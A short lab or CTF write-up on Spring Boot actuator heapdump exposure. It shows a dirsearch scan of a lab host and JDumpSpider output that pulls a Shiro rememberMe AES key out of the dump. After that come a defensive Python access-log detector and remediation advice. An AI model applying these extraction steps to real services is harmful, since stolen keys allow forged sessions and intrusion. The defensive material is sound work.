Heapdump
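1. Introduction:
Commonly seen with the Spring Boot framework: by obtaining the heapdump and parsing it, sensitive information (such as the ShiroKey) can be extracted from it.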
GreatWall > 3.1. SpringBoot heapdump
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# dirsearch -u http://172.28.23.33:8080/ -x 403,404
Target: http://172.28.23.33:8080/
[02:13:52] Starting:
[02:13:57] 200 - 2KB - /actuator
[02:13:57] 200 - 82KB - /actuator/threaddump
[02:13:58] 200 - 29MB - /actuator/heapdump
Task Completed
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
===========================================
CookieRememberMeManager(ShiroKey)-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================
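From the defender's side, the exposure shown above is visible in the web access log as successful downloads of actuator endpoints. The following is an added example, not part of the original notes: a small detector that assumes the common/combined access log format; the function name, the endpoint list and the sample log lines are constructed for illustration.

```python
import re

# Actuator endpoints whose successful download exposes memory or configuration.
SENSITIVE = ("/actuator/heapdump", "/actuator/threaddump", "/actuator/env")

# Common/combined log format: ip - user [time] "METHOD path proto" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_actuator_exposure(lines):
    """Return one finding per successful request to a sensitive actuator endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Drop the query string and trailing slash; endswith() tolerates a context path.
        path = m["path"].split("?", 1)[0].rstrip("/")
        if m["status"] != "200" or not any(path.endswith(s) for s in SENSITIVE):
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        findings.append({
            "ip": m["ip"], "time": m["ts"], "path": path, "bytes": size,
            # A heap dump holds every live object, including keys and credentials.
            "severity": "critical" if path.endswith("/heapdump") else "high",
        })
    return findings

# Constructed sample log lines (not taken from the page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:02:13:57 +0000] "GET /actuator HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2025:02:13:57 +0000] "GET /actuator/threaddump HTTP/1.1" 200 83968',
    '10.0.0.5 - - [01/Jan/2025:02:13:58 +0000] "GET /actuator/heapdump HTTP/1.1" 200 30408704',
    '10.0.0.5 - - [01/Jan/2025:02:13:58 +0000] "GET /admin HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2025:02:20:00 +0000] "GET /actuator/heapdump HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for f in find_actuator_exposure(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['ip']} {f['path']} {f['bytes']} bytes at {f['time']}")
```

A finding means the endpoint should be taken out of `management.endpoints.web.exposure.include` or placed behind authentication, and any secret that lived in the dumped process (such as the Shiro rememberMe key) should be rotated.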
